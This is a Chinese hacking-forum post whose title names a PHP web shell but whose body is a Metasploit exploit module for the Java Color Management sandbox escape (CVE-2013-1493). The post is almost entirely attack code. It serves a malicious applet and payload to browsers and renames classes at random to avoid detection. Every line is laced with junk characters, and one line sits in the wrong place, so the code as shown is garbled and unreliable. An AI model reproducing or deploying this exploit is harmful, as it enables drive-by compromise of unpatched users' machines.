找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2288|回复: 0
打印 上一主题 下一主题

STUNSHELL PHP Web Shell远程执行代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:31:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
##
" ?% N$ C  q1 G' ?  K
+ i$ ?, f/ `; T: P) G/ @# This file is part of the Metasploit Framework and may be subject to2 g3 N( |$ F' G$ T# r
# redistribution and commercial restrictions. Please see the Metasploit
! a, m6 l. _& W# web site for more information on licensing and terms of use.
6 U. o5 z% F: k. a# K# http://metasploit.com/
, v0 a) {( M  f, d: J##' ~8 r) ~3 L$ _% n, W# E
require ‘msf/core’# P7 j8 h) d) g* Y9 A0 A( T! o
require ‘rex’; F3 ^$ a7 Q( v( W
class Metasploit3 < Msf::Exploit::Remote
9 Y3 r' _' J; m) B  U0 I: x, sRank = NormalRanking
4 u5 L+ N" I2 B* q4 |# v3 b1 rinclude Msf::Exploit::Remote::HttpServer::HTML$ H8 e+ r4 D5 V" c# h
include Msf::Exploit::EXE3 n  i; z* r& ?0 B0 z
include Msf::Exploit::Remote::BrowserAutopwn' w# u3 S, S# N7 O! w# ^. d$ k- O1 |+ {
autopwn_info({ :javascript => false })4 b3 V( U9 W5 Z. f, J/ N5 t# v
def initialize( info = {} )
6 C4 Z9 }  [2 w- P1 U. isuper( update_info( info,
0 P; ]" n4 v; M( G‘Name’ => ‘Java CMM Remote Code Execution’,
2 z* X$ }. l- B% x+ i‘Description’ => %q{8 z9 B5 T& C) B2 r
This module abuses the Color Management classes from a Java Applet to run' e" A; q, Q0 D& z: d
arbitrary Java code outside of the sandbox as exploited in the wild in February6 c6 R+ D$ ]) @: F9 g
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u412 R/ a1 q, r/ v7 q4 n% L% A  \
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
0 c2 C( h' Z/ K2 nsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java3 y9 }0 r7 Y0 A; ]- l
warning in order to run the malicious applet.8 y* w% b; W2 j$ o8 |5 I
},
4 }/ I  ?) ~9 U  [‘License’ => MSF_LICENSE,% U0 q5 `3 }) l+ O5 O  s5 D/ q8 b$ {
‘Author’ =>
+ R- Q! `; _6 D; L4 L) t1 }'Unknown', # Vulnerability discovery and Exploit4 \1 w3 @8 K! i/ ^! d' i
'juan vazquez' # Metasploit module (just ported the published exploit). k$ u+ l3 c& I; i+ k
],2 u+ B0 h( T5 h9 V6 U7 E
‘References’ =>
, `* ~9 C% h$ }* D4 e% [[2 x9 Y6 C- Q6 [) T% Y0 m/ c' X* o
[ 'CVE', '2013-1493' ],
8 E2 B' O1 O) j. ^. {[ 'OSVDB', '90737' ],
6 |! x4 g2 e, ~- z. S3 I[ 'BID', '58238' ],
; E7 g/ S: ~. t9 {- }[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
8 e2 R3 ^+ l* R+ u1 W[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],* u# @% x3 l" r: t1 Q7 d; c
[ 'URL', 'http://pastie.org/pastes/6581034' ]! B# R6 R" m9 A$ U2 U+ c
],
" E+ C' b' ?2 ]) w‘Platform’ => [ 'win', 'java' ],
9 I! s/ R( h6 D6 c: \‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
) d* e2 K8 U4 g2 i) I. @‘Targets’ =>
3 M1 L" {, x/ s; `[0 Y% _% q3 c% t, C3 d0 J
[ 'Generic (Java Payload)',
1 v# I2 J- I& v: B{
0 S. m9 r& f* Q, u& d$ U' n'Platform' => 'java',5 `* v' @9 R+ J
'Arch' => ARCH_JAVA- m3 u2 h" c+ G+ `  @
}
* c3 M: ]+ O* _! {2 v],' O& a1 C% O" b( Y0 A, R5 N! _
[ 'Windows x86 (Native Payload)',$ L# _$ ^1 r& E+ b/ w, j
{; z# p/ U! ~( C7 r) \
'Platform' => 'win',' m+ D3 Y/ q! @8 f" z
'Arch' => ARCH_X86
$ G  n# k( ~2 T}) I2 ?' ^# p, J/ m/ D/ r  ]2 W% p
]' J- |( \! L. e, a$ k* d+ I( a5 W: N
],
8 @! Y! t% I+ }1 [, t7 n7 ~‘‘DisclosureDate’ => ‘Mar 01 2013′
2 F2 {6 b, P- W' ]))
* H* w1 p  K9 d3 S: y& @/ I# J. ]% t1 bend$ z- j/ [- M# s
def setup- {* r2 c6 @4 o2 S' y
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)! ~% ~0 ^4 {8 p4 Z# w
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
+ T& g) Y: K$ F8 ~  F( Mpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
; i  X$ z& M3 ]! v1 X@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
3 v( d: h6 A9 h! a6 a  m9 a. I& u. Epath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
3 l# X( A' c% e3 H5 s3 W8 h" P0 n@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }1 ?9 Z' ?+ b9 ~! ^1 p4 }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)# }! ?/ d; ^/ C
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
0 B1 q$ @1 i1 y3 R0 I6 }: T) N@init_class_name = rand_text_alpha(“Init”.length)
. T1 K! V, R/ C9 j6 g@init_class.gsub!(“Init”, @init_class_name)
8 M  Q- H4 B' K4 b; I: w4 \0 gsuper4 u; l# n$ _& k, F) Y
end  t. F) `" n# l4 I+ K
def on_request_uri(cli, request)& x  U) ]6 n; K# \
print_status(“handling request for #{request.uri}”)$ ~; F" f. I2 z8 \
case request.uri
/ l( n  S9 z' n8 Z8 }when /\.jar$/i7 L* |- E7 @' G
jar = payload.encoded_jar
4 e7 j9 {* j3 x; p/ j/ Rjar.add_file(“#{@init_class_name}.class”, @init_class)
& M" U6 e! h, f' e6 D! ~' Z" vjar.add_file(“Leak.class”, @leak_class)
( o, A' m; L9 v% t* rjar.add_file(“MyBufferedImage.class”, @buffered_image_class)0 V, C, ~* N2 E% S
jar.add_file(“MyColorSpace.class”, @color_space_class)
- M7 D3 ]1 A( x! J7 \& iDefaultTarget’ => 1,
0 k3 i! [5 d5 K# @! x5 S1 Ometasploit_str = rand_text_alpha(“metasploit”.length)
. F3 x7 u+ k9 K: q" T+ |. ]9 apayload_str = rand_text_alpha(“payload”.length)3 {; W3 u* \; Z1 u$ f5 m; u
jar.entries.each { |entry|
; i( M, i9 \( y7 V! Ientry.name.gsub!(“metasploit”, metasploit_str)
# V) d7 t1 b% `3 mentry.name.gsub!(“Payload”, payload_str)1 S% g$ ~4 {' `$ [; P  Y
entry.data = entry.data.gsub(“metasploit”, metasploit_str)( M) F+ f3 R+ C& I! Q
entry.data = entry.data.gsub(“Payload”, payload_str)* s$ x; z+ T. Y- s5 U; M# p
}- w5 ?* V, _4 E. F) S3 j! S) I
jar.build_manifest
6 H! D$ Z, K* O4 l9 jsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })/ c7 v; D9 _* W1 V3 e, g
when /\/$/
9 Q9 k! m% B/ m) p" H  K- ?payload = regenerate_payload(cli)
4 H6 }1 K1 n! u6 _' C+ G! fif not payload8 F# c* X- ?# W, v2 o$ x. a
print_error(“Failed to generate the payload.”)4 v' `! f; s& U
send_not_found(cli). ?# t# z& n& d8 l$ r$ h& u' f# P
return3 j4 t. V9 b% n8 i6 K* P( ^# b! n
end
/ Z* y3 a; a' D8 }5 L( P  Wsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
% w1 }& A: R( Ielse
: b/ o- k+ I# f/ e( ~/ @send_redirect(cli, get_resource() + ‘/’, ”)
- d# y: ?1 e" e! rend
/ v/ U& c' g0 R0 uend
8 d' i- j% L- J" H) a$ A* ]def generate_html
0 u- c8 P* F% X0 d% f  ]html = %Q|<html><head><title>Loading, Please Wait…</title></head>|' i/ D: R3 X2 @3 g( ], L4 C/ b6 F
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|+ k7 W* f0 }! c/ E0 F5 {
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|  r+ ]3 W% J# t
html += %Q|</applet></body></html>|# C% Z* U3 P" J3 u( a8 w; H! @
return html
" V4 E( A3 v* o3 j5 Eend( r- B" D0 U) k# M$ l" B7 Z$ D3 W0 h
end6 _" X' G: K9 Z8 D. s( v; u; c' [4 X
end, h; m; M% Y" I: M$ K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表